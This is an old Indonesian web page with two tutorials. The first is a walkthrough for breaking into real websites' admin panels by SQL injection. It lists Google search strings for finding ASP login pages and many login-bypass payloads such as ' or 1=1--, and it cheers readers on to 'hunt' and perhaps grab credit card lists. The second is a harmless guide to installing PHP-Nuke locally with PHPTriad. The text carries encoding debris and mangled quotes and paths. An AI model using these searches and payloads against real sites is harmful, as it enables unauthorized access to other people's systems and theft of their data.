Public Tutorial
SQL INJECTION
SQL Injection
adalah memasukkan kode-kode SQL untuk mendapatkan akses ke
database yang lebih besar daripada yang seharusnya kita
dapatkan, terutama pada script yang tidak memvalidasi input
dari user.
SQL Injection sebenarnya sudah sering dibahas dimana-mana,
tetapi ternyata masih banyak webmaster yang belum tahu atau
tidak peduli akan kelemahan ini.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
?
Internet
Explorer (wajib)
?
PC yang
terhubung ke Internet (wajib, kecuali Anda mau hack PC Anda
sendiri)
?
Segelas
kopi untuk menghilangkan rasa kantuk
(optional)
?
Metallica
(optional)
--?#060;/font>Pertama bukalah www.google.com (google pancen oye) untuk mencari script yang terhubung ke database. Masukkan salah satu keyword di bawah ini (lengkap dengan tanda petiknya) :
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
"root/login.asp"
"admin/index.asp"
--?#060;/font>Anda
bisa menambahkan daftarnya berdasarkan kreatifitas Anda
sendiri.
Bukalah salah satu link yang ditemukan oleh google,
kemungkinan Anda akan menjumpai sebuah halaman login (user
name dan password).
--?#060;/font>Masukkan
kode-kode berikut,
User name : ?or ‘a?’a
Password : ?or ‘a?’a
(termasuk tanda petiknya)
--?#060;/font>Jika
berhasil, kemungkinan Anda akan masuk ke admin panel, di mana
Anda bisa menambahkan berita, mengedit user yang lain, merubah
about, dan lain-lain. Jika beruntung Anda bisa mendapatkan
daftar kredit card yang banyak.
Jika tidak berhasil, cobalah mencari link yang lain yang
ditemukan oleh google.--
--?#060;/font>Banyak
variasi kode yang mungkin, antara lain :
User name : admin
Password : ?or ‘a?’a
--?#060;/font>Di
bawah ini bisa dimasukkan baik ke user name maupun password :
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
--?#060;/font>Anda
masih bisa memperpanjang daftarnya sesuai kreatifitas Anda.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan,
kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya
Anda akan berhasil.
Selamat berburu . . . .!!!
Referensi :
SQL injection Basic Tutorial by Comsec
Advanced SQL Injection In SQL Server Applications by Chris
Anley
***2004***
PHP NUKE INSTALATION
Kasulitan untuk install PHPNuke secara online, jangan bingung,
PHPNuke juga bisa di instal di localhost juga loh. Sebagai
ajang uji coba sebelum di upload ke internet. Nah pada
kesempatan ini kita berikan tutorial nya....
Perkakas yang dibutuhkan
1. Web Server, pada kesempatan ini kita menggunakan software
PHPTriad yang merupakan salah software paket server di mana
didalamnya sudah termasuk Apache, PHP dan Mysql yang
kesemuanya dibutuhkan dalam PHPNuke. Software ini dapat di
download di http://www.phpgeek.com
2. PHPNuke itu sendiri, file ini dapat di download di http://phpnuke.org
Tahap instalasi
1. Jalankan file install PHPTriad yang telah di download tadi.
Jika kamu sukses, maka secara default file-file dari PHPTriad
akan di simpan di C:Apache, yang didalam terdapat banyak
direktory, tapi yg perlu di perhatikan adalah direktory htdocs,
mysql dan php. Sedangkan file apache itu sendiri terletak di
C:Apache. (Jika sukses menginstal PHPtriad, maka otomatis di
menu program akan terbentuk shorcut dari PHPTriad ini.)
2. Ekstraklah file phpnuke yang telah di download dan simpan
di C:Apachehtdocsphpnuke.
3. Langkah selanjutnya, kita masuk ke control panel dari
PHPTriad, dengan cara meng-klik Start->Programs->PHPTriad->PHPTriad
Control Panel, maka dilayar komputer akan tampil jendela
Kontrol panel dari PHPTriad.
4. Dari jendela kontrol panel ini, maka kita harus menjalankan
(harus berurutan) ;
a. Install Apache Service, menginstal apache sebagai suatu
service
b. Start Apache, mengaktifkan server apache
c. Start MySql, menjalankan database MySql sesuai dengan jenis
Sistem Operasi (SO) yang di gunakan, apakah SO nya win 95, 98
atau NT, Win2k, XP.
5. Untuk mengetest apakah server sudah terinstall, jalan
browser Internet Explorer lalu ketik http://localhost, jika
sukses maka akan tampil halaman web index.html yang ada pada
root komputer kamu, yaitu di c:apachehtdocs.
6. Selanjutnya kita jalankan PHPMyAdmin untuk menginstal
database PHPnuke, dengan cara : Klik Start->Program->PHPTriad->
PHPTriad Control Panel, dari jendela yang muncul klik link
LaunchPHPMyAdmin.
7. Pada halaman Web Welcome to phpMyAdmin, ditunjukkan bahwa
anda sebagai root sedang menjalankan MySQL versi xxx. Pada
kotak isian Create new database ketikkan nuke, lalu klik
Create untuk membentuk database MySQL dengan nama nuke.
8. Databases nuke terbentuk, namun belum ada tabel apa pun
pada databses ini. Berikutnya kita harus mengisi database ini
dengan tabel yang terdapat pada file nuke.sql
9. Klik tombol Browse yang berada di sebelah kanan “Location
of the text file?dan dapatkan file nuke.sql yang berada di
direktori C:apachehtdocsphpnukesql lalu pilih file itu dan
klik Open
10. Kini pada kotak isian di bawah Location of the textfile
telah terisi path ke file nuke.sql. Kini anda tinggal mengklik
tombol Go untuk mengisikan tabel-tabel yang ada pada file teks
nuke.sql ke database nuke.
11. SQL QUERY MENGISI TABEL, Akan tampil halaman web yang
menginformasikan bahwa pada database nuke kini telah terdapat
65 tabel yang berasal dari nuke.sql, di antaranya nuke_access,
nuke_author, dan lain-lain yang terlihat juga pada kolom
sebelah kiri.
12. MENJALANKAN MYSQL, Kembali ke PHPMyAdmin dan pilih Start
MySQL. Ada dua pilihan di sini, bergantung sistem operasi yang
digunakan yaitu NT/W2K/XP atau 95/98/ME. Akan tampil pesan
bahwa MySQL telah dijalankan.
13. SELAMAT PORTAL ANDA TERBENTUK!, Portal PHP-Nuke anda telah
terbentuk! Buka browser, masuk ke http://localhost/phpnuke/html
dan akan tampil halaman selamat datang dari PHP-Nuke. Klik
link Administrator page untuk melihat fitur apa saja yang ada
pada PHP-Nuke.
14. SEBAGAI ADMNISTRATOR, Perhatikan banyaknya fitur yang
tersedia pada portal PHP gratis ini: Add Story,Backup DB,
Blocks, dan lain-lain.
15. MEMILIH THEME, Daftarkan diri anda sebagai salah seorang
user biasa. Anda akan mendapatkan password untuk login dan
anda mempunyai halaman Web sendiri yang dapat anda pilih
sendiri Theme-nya.
Now... U can learn ur Instalation with this tutorial
***2004***
